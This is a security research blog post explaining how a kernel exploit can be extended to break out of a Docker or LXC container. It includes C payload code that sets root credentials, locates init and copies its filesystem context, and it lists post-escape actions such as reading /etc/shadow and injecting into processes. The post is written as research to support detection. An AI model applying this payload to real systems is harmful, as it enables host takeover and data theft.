You Think That’s Air You’re Breathing?

An Exercise in Practical Container Escapology

Introduction

Containerization has revolutionized how software is developed and deployed by providing powerful specificity and control for devs and ops alike. By isolating software environments and interactions, containers categorically eliminate a variety of problems which have historically plagued the software development process, such as dependency conflicts and name collisions. Containers also provide some security properties, including version management, an expression of intent, and often reduced attack surface. However, it is important to understand that although the organizational isolation of containers is what enables these security properties, isolation itself is not a security property of containers.

As the use of containers in production Linux environments continues to increase, so does the interest in how the technology responsible for containers can be used and abused to break free from the confines of a container. Recently there was a fair amount of hype surrounding the vulnerability in runc, and for good reason: getting out of the container gives the attacker much broader access to a host, enabling interaction with other containers, and the ability to view and modify configurations. But what seemed lost in this hype is that the ability to escape containers is not confined to a one-off vulnerability in container management programs or orchestrators.

Simply put, containers are just processes, and as such they are governed by the kernel like any other process. Thus any kernel-land vulnerability which yields arbitrary code execution can be exploited to escape a container. To demonstrate this, Capsule8 Labs has created an exploit that removes the process from its confines and gives it root access in the Real World. Let’s take a look at what was involved.

Requirements

Like most (but not all!) privilege escalation exploits that target Linux, the first thing we need is a kernel vulnerability. These are found and patched on a regular basis, and from time to time, a proof of concept exploit is released that demonstrates the impact of the issue. For the purposes of this post, we are going to use a combination of two vulnerabilities that were discovered and exploited by Andrey Konovalov, a Googler who regularly shares vulnerabilities he finds, along with exploit code. Thanks, Andrey! We use the first vulnerability as our ASLR bypass, as the method included in the second PoC exploit is unreliable if the target system has a high uptime.

We selected these two vulnerabilities as an example of a scenario where SMEP/SMAP can be disabled, and subsequently the kernel can be made to execute user-controlled code from a userland process (which is effectively like having shellcode that can be written in C). A full write-up on the mechanism used by these exploits to get us to this point of the kernel executing userland code is beyond the scope of this post. The purpose of this post is to describe how once any given kernel exploit reaches this point, a payload can be applied to escape a container.

Relevant Structures

In reality, very little separates a process from being in or out of a container. Furthermore, you don’t need to play with namespaces in order to escape the container’s confines and interact with the host. It can come down to as little as interacting with the following data structures:

task_struct

This struct is the guts of a process in the kernel, and it holds a few things we care about:

  • pid: the ID number of the task, which in kernel-land is better thought of as a user-land thread ID
  • real_parent: a pointer to the task_struct of the parent task. We follow this pointer repeatedly, checking each parent’s pid, in order to find PID 1, the PID belonging to init.
  • fs: a pointer to the fs_struct describing the filesystem context in which the task is operating

fs_struct

This defines the root directory and present working directory for the task. We can copy this over from another process that is not in a container in order to have our task point at a directory in the host file system. By copying init’s fs_struct, we can be sure to land in the root directory of the host. To do this, we call the copy_fs_struct kernel function, as it appropriately handles the accounting work of locking the source structure and updating the reference counts on the underlying members of the fs_struct.

Breaking out

When it comes to actually breaking out, a few things need to happen. We need to:

  1. Escalate to root – Set the credentials of our task to that of root – ensuring we are actually root once we break out.
  2. Find init – Find the task_struct for PID 1, the init process – we want to copy a lot of its data to our own task.
  3. Copy filesystem info – Copy the fs_struct information from init’s structs to ours.
  4. Execute a root shell – Execute /bin/bash to drop us into a root shell.

Of the four steps above, 2 and 3 are specific to our container escape exploit. The crux of our changes is shown below. We have added one function named get_task(), which gets the value of current (a pointer to our task’s task_struct). The credential call at the top of get_root() was already in the original exploit, available here; the search for init and the fs_struct copy that follow it are our additions.

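/* Type of the kernel's copy_fs_struct(), which we call through a raw address. */
typedef unsigned long __attribute__((regparm(3))) (*_copy_fs_struct)(unsigned long init_task);

/* Return the value of current: a pointer to our task's task_struct.
 * The 0xD380 offset is specific to the kernel build we tested. */
uint64_t get_task(void) {
    uint64_t task;
    asm volatile ("movq %%gs:0xD380, %0":"=r"(task));
    return task;
}

void get_root(void) {
    char *task;
    char *init;
    uint32_t pid = 0;

    /* Step 1 (from the original exploit): give our task root credentials. */
    ((_commit_creds)(COMMIT_CREDS))(
        ((_prepare_kernel_cred)(PREPARE_KERNEL_CRED))(0));

    /* Step 2: follow real_parent up the process tree until we reach PID 1. */
    task = (char *)get_task();
    init = task;
    while (pid != 1) {
        init = *(char **)(init + TASK_REAL_PARENT_OFFSET);
        pid = *(uint32_t *)(init + TASK_PID_OFFSET);
    }

    /* Step 3: point our task at a fresh copy of init's fs_struct. */
    *(uint64_t *)(task + TASK_FS_OFFSET) = ((_copy_fs_struct)(COPY_FS_STRUCT))(*(long unsigned int *)(init + TASK_FS_OFFSET));
}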

Beyond adding get_task(), we altered the get_root() function already present in Andrey’s PoC for CVE-2017-1000112. There are two main changes here:

  • We traverse up the process’ lineage through the real_parent pointer in the task_struct to find the task_struct of init (PID 1)
  • We copy init’s fs_struct to our task to ensure our new shell has access to the host filesystem.

It’s worth noting that the kernel functions prepare_kernel_cred and commit_creds, which the exploit uses to get root credentials, also set our task’s user namespace to that of the host. In Docker containers this changes nothing, because by default Docker containers already run in the host’s user namespace.

The full code of the modified exploit that escapes the container is available here. Check out the exploit in action below!

In the video, we can see that inside the container, as the ubuntu user, we have a limited view of processes, and indeed the /proc directory is owned by nobody/nogroup, an indication that we are in an unprivileged container. After running the exploit, our prompt still shows us as being inside the ubuntu_lxc_usr container, but we now have access to the host’s file system: we can list processes from outside our container and read the /etc/shadow file, which contains entries from the host and not the container. From this point, there’s no need to even bother with changing namespaces; you have free rein to:

  • Write or overwrite host or other container files (including kubelet configs)
  • Interact with Docker (perhaps pull and launch a new fun privileged container)
  • Inject code or harvest data from processes (host or container) via /proc/pid/mem
  • Load / unload kernel modules

Our exploit has been tested against Ubuntu kernel 4.8.0-34-generic, with containers running in Kubernetes with Docker, and unprivileged containers in a local LXC deployment. Note that you will need to find your own function and struct offsets if you’re trying this for a different kernel version.

Conclusion

The rules governing containers are the same as any other process: some can be bent, and others can be broken. Vulnerabilities and misconfigurations in container-management programs are not the only means by which an attacker can escape a container. And while the security properties of containers should be celebrated, the isolation of container processes should not be treated as a security boundary. This is why it is important to have detection of kernel exploitation in your strategy for defense. Capsule8 provides exploitation detection out-of-the-box, identifying container-escapes and other kernel malfeasance.

The Capsule8 Labs team conducts offensive and defensive research to understand the threat landscape for modern infrastructure and to continuously improve Capsule8’s attack coverage.